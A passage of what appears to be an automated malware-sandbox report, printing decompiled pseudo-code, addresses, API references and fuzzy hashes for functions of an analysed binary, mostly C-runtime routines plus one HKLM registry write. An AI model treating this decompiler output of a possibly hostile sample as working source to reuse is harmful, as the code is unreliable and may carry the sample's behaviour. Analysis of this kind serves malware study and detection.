					asm("fcomp qword [0x40b210]");
					asm("fnstsw ax");
					asm("sahf");
					if(_t19 <= 0) {
						return 0;
					} else {
						_t10 = 1;
						return _t10;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}








                                                                                                                                                      0x004046ee
                                                                                                                                                      0x004046f0
                                                                                                                                                      0x00404707
                                                                                                                                                      0x004046b1
                                                                                                                                                      0x004046ba
                                                                                                                                                      0x004046c6
                                                                                                                                                      0x004046c9
                                                                                                                                                      0x004046cf
                                                                                                                                                      0x004046d5
                                                                                                                                                      0x004046d7
                                                                                                                                                      0x004046d8
                                                                                                                                                      0x004046e2
                                                                                                                                                      0x004046da
                                                                                                                                                      0x004046dc
                                                                                                                                                      0x004046de
                                                                                                                                                      0x004046de
                                                                                                                                                      0x004046f2
                                                                                                                                                      0x004046f8
                                                                                                                                                      0x00404700
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404702
                                                                                                                                                      0x00404702
                                                                                                                                                      0x00404706
                                                                                                                                                      0x00404706
                                                                                                                                                      0x00404700

                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,0040372C), ref: 004046E8
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 004046F8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                      • API String ID: 1646373207-3105848591
                                                                                                                                                      • Opcode ID: a0086044393bef25fea17c484496c129d2195bd65af643a0966d1da9d9ad48a6
                                                                                                                                                      • Instruction ID: 70ff292064885587df23f269df437abca73237b64940ec06351548063b4fbea1
                                                                                                                                                      • Opcode Fuzzy Hash: a0086044393bef25fea17c484496c129d2195bd65af643a0966d1da9d9ad48a6
                                                                                                                                                      • Instruction Fuzzy Hash: 9FC012A0341301A6E91017B24C4EB2B2544EB81B41F14087AA115F11C0DB7CD000546D
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00406EF0, Relevance: 6.1, APIs: 4, Instructions: 135fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00406EF0(long _a4, void* _a8, long _a12) {
				intOrPtr* _v8;
				long _v12;
				long _v16;
				signed int _v20;
				void _v1048;
				void** _t66;
				signed int _t67;
				intOrPtr _t69;
				signed int _t70;
				intOrPtr _t71;
				signed int _t73;
				signed int _t80;
				int _t85;
				long _t87;
				intOrPtr* _t91;
				intOrPtr _t97;
				struct _OVERLAPPED* _t101;
				long _t103;
				signed int _t105;
				struct _OVERLAPPED* _t106;

				_t101 = 0;
				_v12 = 0;
				_v20 = 0;
				if(_a12 != 0) {
					_t91 = 0x411d60 + (_a4 >> 5) * 4;
					_t105 = (_a4 & 0x0000001f) + (_a4 & 0x0000001f) * 8 << 2;
					__eflags =  *( *_t91 + _t105 + 4) & 0x00000020;
					if(__eflags != 0) {
						E00406E18(__eflags, _a4, 0, 2);
					}
					_t66 =  *_t91 + _t105;
					__eflags = _t66[1] & 0x00000080;
					if((_t66[1] & 0x00000080) == 0) {
						_t67 = WriteFile( *_t66, _a8, _a12,  &_v16, _t101);
						__eflags = _t67;
						if(_t67 == 0) {
							_a4 = GetLastError();
						} else {
							_a4 = _t101;
							_v12 = _v16;
						}
						L15:
						_t69 = _v12;
						__eflags = _t69 - _t101;
						if(_t69 != _t101) {
							_t70 = _t69 - _v20;
							__eflags = _t70;
							return _t70;
						}
						__eflags = _a4 - _t101;
						if(_a4 == _t101) {
							L25:
							_t71 =  *_t91;
							__eflags =  *(_t71 + _t105 + 4) & 0x00000040;
							if(( *(_t71 + _t105 + 4) & 0x00000040) == 0) {
								L27:
								 *((intOrPtr*)(E004087E3())) = 0x1c;
								_t73 = E004087EC();
								 *_t73 = _t101;
								L24:
								return _t73 | 0xffffffff;
							}
							__eflags =  *_a8 - 0x1a;
							if( *_a8 == 0x1a) {
								goto L1;
							}
							goto L27;
						}
						_t106 = 5;
						__eflags = _a4 - _t106;
						if(_a4 != _t106) {
							_t73 = E00408770(_a4);
						} else {
							 *((intOrPtr*)(E004087E3())) = 9;
							_t73 = E004087EC();
							 *_t73 = _t106;
						}
						goto L24;
					}
					__eflags = _a12 - _t101;
					_v8 = _a8;
					_a4 = _t101;
					if(_a12 <= _t101) {
						goto L25;
					} else {
						goto L6;
					}
					do {
						L6:
						_t80 =  &_v1048;
						do {
							__eflags = _v8 - _a8 - _a12;
							if(_v8 - _a8 >= _a12) {
								break;
							}
							_v8 = _v8 + 1;
							_t97 =  *_v8;
							__eflags = _t97 - 0xa;
							if(_t97 == 0xa) {
								_v20 = _v20 + 1;
								 *_t80 = 0xd;
								_t80 = _t80 + 1;
								__eflags = _t80;
							}
							 *_t80 = _t97;
							_t80 = _t80 + 1;
							__eflags = _t80 -  &_v1048 - 0x400;
						} while (_t80 -  &_v1048 < 0x400);
						_t103 = _t80 -  &_v1048;
						_t85 = WriteFile( *( *_t91 + _t105),  &_v1048, _t103,  &_v16, 0);
						__eflags = _t85;
						if(_t85 == 0) {
							_a4 = GetLastError();
							break;
						}
						_t87 = _v16;
						_v12 = _v12 + _t87;
						__eflags = _t87 - _t103;
						if(_t87 < _t103) {
							break;
						}
						__eflags = _v8 - _a8 - _a12;
					} while (_v8 - _a8 < _a12);
					_t101 = 0;
					__eflags = 0;
					goto L15;
				}
				L1:
				return 0;
			}























                                                                                                                                                      0x00406efc
                                                                                                                                                      0x00406f01
                                                                                                                                                      0x00406f04
                                                                                                                                                      0x00406f07
                                                                                                                                                      0x00406f16
                                                                                                                                                      0x00406f28
                                                                                                                                                      0x00406f2b
                                                                                                                                                      0x00406f30
                                                                                                                                                      0x00406f38
                                                                                                                                                      0x00406f3d
                                                                                                                                                      0x00406f42
                                                                                                                                                      0x00406f44
                                                                                                                                                      0x00406f48
                                                                                                                                                      0x0040701c
                                                                                                                                                      0x00407022
                                                                                                                                                      0x00407024
                                                                                                                                                      0x00407037
                                                                                                                                                      0x00407026
                                                                                                                                                      0x00407029
                                                                                                                                                      0x0040702c
                                                                                                                                                      0x0040702c
                                                                                                                                                      0x00406fd8
                                                                                                                                                      0x00406fd8
                                                                                                                                                      0x00406fdb
                                                                                                                                                      0x00406fdd
                                                                                                                                                      0x00407073
                                                                                                                                                      0x00407073
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00407073
                                                                                                                                                      0x00406fe3
                                                                                                                                                      0x00406fe6
                                                                                                                                                      0x0040704a
                                                                                                                                                      0x0040704a
                                                                                                                                                      0x0040704c
                                                                                                                                                      0x00407051
                                                                                                                                                      0x0040705f
                                                                                                                                                      0x00407064
                                                                                                                                                      0x0040706a
                                                                                                                                                      0x0040706f
                                                                                                                                                      0x00407045
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00407045
                                                                                                                                                      0x00407056
                                                                                                                                                      0x00407059
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00407059
                                                                                                                                                      0x00406fea
                                                                                                                                                      0x00406feb
                                                                                                                                                      0x00406fee
                                                                                                                                                      0x0040703f
                                                                                                                                                      0x00406ff0
                                                                                                                                                      0x00406ff5
                                                                                                                                                      0x00406ffb
                                                                                                                                                      0x00407000
                                                                                                                                                      0x00407000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406fee
                                                                                                                                                      0x00406f51
                                                                                                                                                      0x00406f54
                                                                                                                                                      0x00406f57
                                                                                                                                                      0x00406f5a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406f60
                                                                                                                                                      0x00406f60
                                                                                                                                                      0x00406f60
                                                                                                                                                      0x00406f66
                                                                                                                                                      0x00406f6c
                                                                                                                                                      0x00406f6f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406f74
                                                                                                                                                      0x00406f77
                                                                                                                                                      0x00406f79
                                                                                                                                                      0x00406f7c
                                                                                                                                                      0x00406f7e
                                                                                                                                                      0x00406f81
                                                                                                                                                      0x00406f84
                                                                                                                                                      0x00406f84
                                                                                                                                                      0x00406f84
                                                                                                                                                      0x00406f85
                                                                                                                                                      0x00406f87
                                                                                                                                                      0x00406f92
                                                                                                                                                      0x00406f92
                                                                                                                                                      0x00406fa2
                                                                                                                                                      0x00406fb7
                                                                                                                                                      0x00406fbd
                                                                                                                                                      0x00406fbf
                                                                                                                                                      0x0040700a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040700a
                                                                                                                                                      0x00406fc1
                                                                                                                                                      0x00406fc4
                                                                                                                                                      0x00406fc7
                                                                                                                                                      0x00406fc9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406fd1
                                                                                                                                                      0x00406fd1
                                                                                                                                                      0x00406fd6
                                                                                                                                                      0x00406fd6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406fd6
                                                                                                                                                      0x00406f09
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406FB7
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                      • Opcode ID: e64617ffc67776a099c2fb0b7240a385518e7f0ffdc03b63cbfcd62c863cf82a
                                                                                                                                                      • Instruction ID: 27cf5cec958d878707709140bf2fb96cf6b521a630f13871181a3c8bb6886863
                                                                                                                                                      • Opcode Fuzzy Hash: e64617ffc67776a099c2fb0b7240a385518e7f0ffdc03b63cbfcd62c863cf82a
                                                                                                                                                      • Instruction Fuzzy Hash: 9151D371904209EFCB11CF68CD80A9E7BB5FF45340F2181BAE916EB291D734EA50CB69
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001815A, Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001815A(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E1000D4F5( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E10013A1A( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E1000F720(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0xa045ff98
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0xa045ff98
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								__eflags = _v8;
								_t27 = _t56 + 0xac; // 0xa045ff98
								_t57 =  *_t27;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                                                                                                                                                      0x10018162
                                                                                                                                                      0x10018169
                                                                                                                                                      0x1001817e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10018170
                                                                                                                                                      0x10018172
                                                                                                                                                      0x1001818a
                                                                                                                                                      0x1001818f
                                                                                                                                                      0x10018192
                                                                                                                                                      0x10018195
                                                                                                                                                      0x100181be
                                                                                                                                                      0x100181c3
                                                                                                                                                      0x100181c7
                                                                                                                                                      0x10018248
                                                                                                                                                      0x1001825a
                                                                                                                                                      0x10018263
                                                                                                                                                      0x10018265
                                                                                                                                                      0x100181a5
                                                                                                                                                      0x100181a5
                                                                                                                                                      0x100181a8
                                                                                                                                                      0x100181aa
                                                                                                                                                      0x100181ad
                                                                                                                                                      0x100181ad
                                                                                                                                                      0x100181ad
                                                                                                                                                      0x100181ad
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100181b3
                                                                                                                                                      0x10018227
                                                                                                                                                      0x10018227
                                                                                                                                                      0x1001822c
                                                                                                                                                      0x10018232
                                                                                                                                                      0x10018235
                                                                                                                                                      0x10018237
                                                                                                                                                      0x1001823a
                                                                                                                                                      0x1001823a
                                                                                                                                                      0x1001823a
                                                                                                                                                      0x1001823a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001823e
                                                                                                                                                      0x100181c9
                                                                                                                                                      0x100181cc
                                                                                                                                                      0x100181cc
                                                                                                                                                      0x100181d2
                                                                                                                                                      0x100181d5
                                                                                                                                                      0x100181fc
                                                                                                                                                      0x100181ff
                                                                                                                                                      0x100181ff
                                                                                                                                                      0x10018205
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10018207
                                                                                                                                                      0x1001820a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001820c
                                                                                                                                                      0x1001820c
                                                                                                                                                      0x1001820f
                                                                                                                                                      0x1001820f
                                                                                                                                                      0x10018215
                                                                                                                                                      0x10018183
                                                                                                                                                      0x10018183
                                                                                                                                                      0x1001821e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001821e
                                                                                                                                                      0x100181d7
                                                                                                                                                      0x100181da
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100181de
                                                                                                                                                      0x100181ec
                                                                                                                                                      0x100181ef
                                                                                                                                                      0x100181f5
                                                                                                                                                      0x100181f7
                                                                                                                                                      0x100181fa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100181fa
                                                                                                                                                      0x10018197
                                                                                                                                                      0x1001819a
                                                                                                                                                      0x1001819c
                                                                                                                                                      0x100181a2
                                                                                                                                                      0x100181a2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10018174
                                                                                                                                                      0x10018174
                                                                                                                                                      0x10018179
                                                                                                                                                      0x1001817b
                                                                                                                                                      0x1001817b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10018179
                                                                                                                                                      0x10018172

                                                                                                                                                      APIs
                                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1001818A
                                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 100181BE
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,10016B7E,?,?,00000002), ref: 100181EF
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,10016B7E,?,?,00000002), ref: 1001825D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                                      • Opcode ID: 5e8ca58f192645aeac23bdabe86f34e73e76cd9a67157fe0bad94941ff89931c
                                                                                                                                                      • Instruction ID: 8c2b7c8d3196bbd4c2d7993dcbbe5c0e1781117acee873ad45468beb87eff19f
                                                                                                                                                      • Opcode Fuzzy Hash: 5e8ca58f192645aeac23bdabe86f34e73e76cd9a67157fe0bad94941ff89931c
                                                                                                                                                      • Instruction Fuzzy Hash: 37318D32A04296FFEB11CFA4CC819AE7BE9FF02251F1585A9E4509F1A1D730DB81DB51
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1000C9E0, Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 27%
                                                                                                                                                      			E1000C9E0(intOrPtr* __eax, void* __edx, void* __edi) {
				intOrPtr* _t14;
				intOrPtr* _t17;
				intOrPtr _t20;
				intOrPtr _t36;
				intOrPtr* _t38;

				 *__eax =  *__eax + __edx;
				 *0xba =  *0xba + __edx;
				asm("rol dh, 0x0");
				asm("adc [edx+edi*4], ah");
				 *0xba =  *0xba + __edx;
				 *0x00000178 =  *((intOrPtr*)(0x178)) + __edx;
				asm("adc dl, al");
				 *((intOrPtr*)(0x178)) =  *((intOrPtr*)(0x178)) + __edx;
				 *((intOrPtr*)(0x178)) =  *((intOrPtr*)(0x178)) + __edx;
				_t14 = _t38;
				 *_t14 =  *_t14 + __edx;
				 *_t14 =  *_t14 + __edx;
				_push(es);
				 *_t14 =  *_t14 + __edx;
				asm("repne rol byte [eax], 0x10");
				asm("adc eax, ebp");
				 *_t14 =  *_t14 + __edx;
				asm("adc [ebx-0x40], ah");
				 *_t14 =  *_t14 + __edx;
				asm("adc [edx+0xc], ch");
				_push(0xc);
				_push(0x103301c0);
				_t15 = E10010534(__eax, __edi, 0xffffffffc29f1178);
				_t36 =  *0x00000180;
				if(_t36 != 0) {
					if( *0x10335f3c != 3) {
						_push(_t36);
						goto L8;
					} else {
						L1000FA03(4);
						 *0x00000174 =  *0x00000174 & 0x00000000;
						_t20 = E1000FA7C(_t36);
						 *0x0000015C = _t20;
						if(_t20 != 0) {
							_push(_t36);
							_push(_t20);
							E1000FAA7();
						}
						 *0x00000174 = 0xfffffffe;
						_t15 = E1000CA86();
						if( *((intOrPtr*)(0x15c)) == 0) {
							_push( *((intOrPtr*)(0x180)));
							L8:
							_t15 = HeapFree( *0x10333310, 0, ??);
							_t47 = _t15;
							if(_t15 == 0) {
								_t17 = E1000F720(_t47);
								 *_t17 = E1000F6E5(GetLastError());
							}
						}
					}
				}
				return E10010579(_t15);
			}








                                                                                                                                                      0x1000c9e2
                                                                                                                                                      0x1000c9ea
                                                                                                                                                      0x1000c9ec
                                                                                                                                                      0x1000c9ef
                                                                                                                                                      0x1000c9f2
                                                                                                                                                      0x1000c9f6
                                                                                                                                                      0x1000c9f8
                                                                                                                                                      0x1000c9fa
                                                                                                                                                      0x1000c9fe
                                                                                                                                                      0x1000ca00
                                                                                                                                                      0x1000ca06
                                                                                                                                                      0x1000ca0e
                                                                                                                                                      0x1000ca10
                                                                                                                                                      0x1000ca16
                                                                                                                                                      0x1000ca18
                                                                                                                                                      0x1000ca1c
                                                                                                                                                      0x1000ca1e
                                                                                                                                                      0x1000ca27
                                                                                                                                                      0x1000ca2a
                                                                                                                                                      0x1000ca2f
                                                                                                                                                      0x1000ca30
                                                                                                                                                      0x1000ca32
                                                                                                                                                      0x1000ca37
                                                                                                                                                      0x1000ca3c
                                                                                                                                                      0x1000ca41
                                                                                                                                                      0x1000ca4a
                                                                                                                                                      0x1000ca8f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000ca4c
                                                                                                                                                      0x1000ca4e
                                                                                                                                                      0x1000ca54
                                                                                                                                                      0x1000ca59
                                                                                                                                                      0x1000ca5f
                                                                                                                                                      0x1000ca64
                                                                                                                                                      0x1000ca66
                                                                                                                                                      0x1000ca67
                                                                                                                                                      0x1000ca68
                                                                                                                                                      0x1000ca6e
                                                                                                                                                      0x1000ca6f
                                                                                                                                                      0x1000ca76
                                                                                                                                                      0x1000ca7f
                                                                                                                                                      0x1000ca81
                                                                                                                                                      0x1000ca90
                                                                                                                                                      0x1000ca98
                                                                                                                                                      0x1000ca9e
                                                                                                                                                      0x1000caa0
                                                                                                                                                      0x1000caa2
                                                                                                                                                      0x1000cab5
                                                                                                                                                      0x1000cab7
                                                                                                                                                      0x1000caa0
                                                                                                                                                      0x1000ca7f
                                                                                                                                                      0x1000ca4a
                                                                                                                                                      0x1000cabd

                                                                                                                                                      APIs
                                                                                                                                                      • ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                      • ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2661975262-0
                                                                                                                                                      • Opcode ID: c35be7ddd376820428f790f1a01076792734619c7c1b30ac8a6f5b23f6ddbc2b
                                                                                                                                                      • Instruction ID: f3614e2ed5c3b7a2523f888baaf654e085a5ac9fd5a4e10f0babc6e667b4755f
                                                                                                                                                      • Opcode Fuzzy Hash: c35be7ddd376820428f790f1a01076792734619c7c1b30ac8a6f5b23f6ddbc2b
                                                                                                                                                      • Instruction Fuzzy Hash: D921F17AA0E3C55FEB02CB705C957597F609F07295F0A009AE0849B1E7DB689C448BA2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001A370, Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001A370(void* __ebx, void* __edi, void* __esi, char* _a4) {
				int _v8;
				int _v12;
				short* _v16;

				_v16 = 0;
				_v12 = E1000CAC0(_a4);
				_v8 = MultiByteToWideChar(0, 0, _a4, _v12, 0, 0);
				_t9 = _v8 + 2; // 0x2
				_v16 = L1000CE56(__ebx, _a4, __edi, __esi, _v8 + _t9);
				_t13 = _v8 + 2; // 0x2
				E1000CF20(__edi, _v16, 0, _v8 + _t13);
				MultiByteToWideChar(0, 0, _a4, _v12, _v16, _v8);
				_v16[_v8] = 0;
				return _v16;
			}






                                                                                                                                                      0x1001a376
                                                                                                                                                      0x1001a389
                                                                                                                                                      0x1001a3a2
                                                                                                                                                      0x1001a3a8
                                                                                                                                                      0x1001a3b5
                                                                                                                                                      0x1001a3bb
                                                                                                                                                      0x1001a3c6
                                                                                                                                                      0x1001a3e2
                                                                                                                                                      0x1001a3ee
                                                                                                                                                      0x1001a3fa

                                                                                                                                                      APIs
                                                                                                                                                      • _strlen.LIBCMT ref: 1001A381
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A39C
                                                                                                                                                      • _memset.LIBCMT ref: 1001A3C6
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A3E2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharMultiWide$_memset_strlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 745779501-0
                                                                                                                                                      • Opcode ID: bebd11029f934ca765ae3ad1a928e3e554420f3dbb80f1cb6d9ef85ef79db074
                                                                                                                                                      • Instruction ID: c5e182b0f3cbb216502a88be2155e7732263ea6a521cd02f1448982d76bc71fb
                                                                                                                                                      • Opcode Fuzzy Hash: bebd11029f934ca765ae3ad1a928e3e554420f3dbb80f1cb6d9ef85ef79db074
                                                                                                                                                      • Instruction Fuzzy Hash: 5311B1B9E00208FBEB14CF94D895F9EB7B5EB48704F108198F9099B385D671AA018B95
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00402B80, Relevance: 6.0, APIs: 4, Instructions: 46registryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00402B80(void* _a4, char* _a8, char _a12) {
				long _t13;
				char* _t23;

				_t23 = _a4;
				if(RegOpenKeyExA(0x80000002, _t23, 0, 0x102,  &_a4) == 0 || RegCreateKeyExA(0x80000002, _t23, 0, 0, 0, 0xf013f, 0,  &_a4, 0) == 0) {
					_t13 = RegSetValueExA(_a4, _a8, 0, 4,  &_a12, 4);
					RegCloseKey(_a4);
					return 0 | _t13 == 0x00000000;
				} else {
					return 0;
				}
			}





                                                                                                                                                      0x00402b85
                                                                                                                                                      0x00402b9f
                                                                                                                                                      0x00402bde
                                                                                                                                                      0x00402beb
                                                                                                                                                      0x00402bf9
                                                                                                                                                      0x00402bc5
                                                                                                                                                      0x00402bc8
                                                                                                                                                      0x00402bc8

